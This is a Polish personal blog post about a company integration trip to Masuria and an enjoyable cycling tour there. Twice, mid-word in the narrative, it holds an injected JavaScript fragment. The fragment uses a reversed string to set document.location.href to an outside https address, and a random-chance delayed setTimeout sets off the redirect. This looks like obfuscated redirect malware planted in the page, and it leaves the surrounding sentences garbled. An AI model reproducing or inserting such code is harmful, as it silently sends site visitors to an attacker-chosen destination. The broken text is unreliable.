Rowerowy rajd po Mazurach

Kiedy szef zaproponował nam wyjazd integracyjny na Mazury, początkowo nie byłem do tego pomysłu przekonany. Bałem się, że będzie nudno i nie będę miał w tamtych rejonach nic do roboty. Jestem raczej fanem aktywnego spędzania czasu, a Mazury kojarzą mi się głównie z żaglami. Jednak gdy powiedział, że atrakcją będzie rajd rowerowy, zmieniłem zdanie. Jestem ich wielkim fanem.

Wycieczka rowerem po Mazurach

wycieczka rowerowa na MazurachZaproponowany przez szefa wyjazd integracyjny, początkowo w ogóle mnie nie zainteresował. Mam wiele własnych pasji, wobec czego nie chciałem tracić czasu na kolejny nudny wypad z ludźmi z firmy. Moje myślenie diametralnie się zmieniło, kiedy prezes wspomniał o możliwych atrakcjach, podczas tego wyjazdu. Wspomniał bowiem o ognisku, możliwości pływania i rzecz jasna o żaglowaniu. Jednak tym, co przykuło akurat moją uwagę, była wycieczka rowerowa na Mazurach. Jedną z moich wielkich pasji jest bowiem kolarstwo. Posiadam kilka rowerów, każdy z nich nadaje się na inną nawierzchnię. Uwielbiam się nimi poruszać, dlatego też, gdy usłyszałem o rowerowej wycieczce, od razu zapisałem się na listę chętnych na ten firmowy wyjazd. Widziałem po minie szefa, że bardzo go tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to ucieszyło. W ślad za mną poszli inni pracownicy firmy, wobec czego zebrała się całkiem spora lista chętnych osób. Muszę przyznać, że nawet nie mogłem doczekać się tego wyjazdu. Byłem niewyobrażalnie skuszony opcją rowerowej wycieczki po mazurskich terenach.

Teraz kiedy właśnie wróciłem z firmowego wyjazdu na Mazury, jestem bardzo szczęśliwy, że się tam wybrałem. Spędziłem świetny czas z koleżankami i kolegami z pracy. Szczególnie miło będę wspominał wspólną wycieczkę rowerową po mazurskich terenach. Spodobało mi się tam do tego stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topnia, że obiecałem sobie, że niedługo tam wrócę.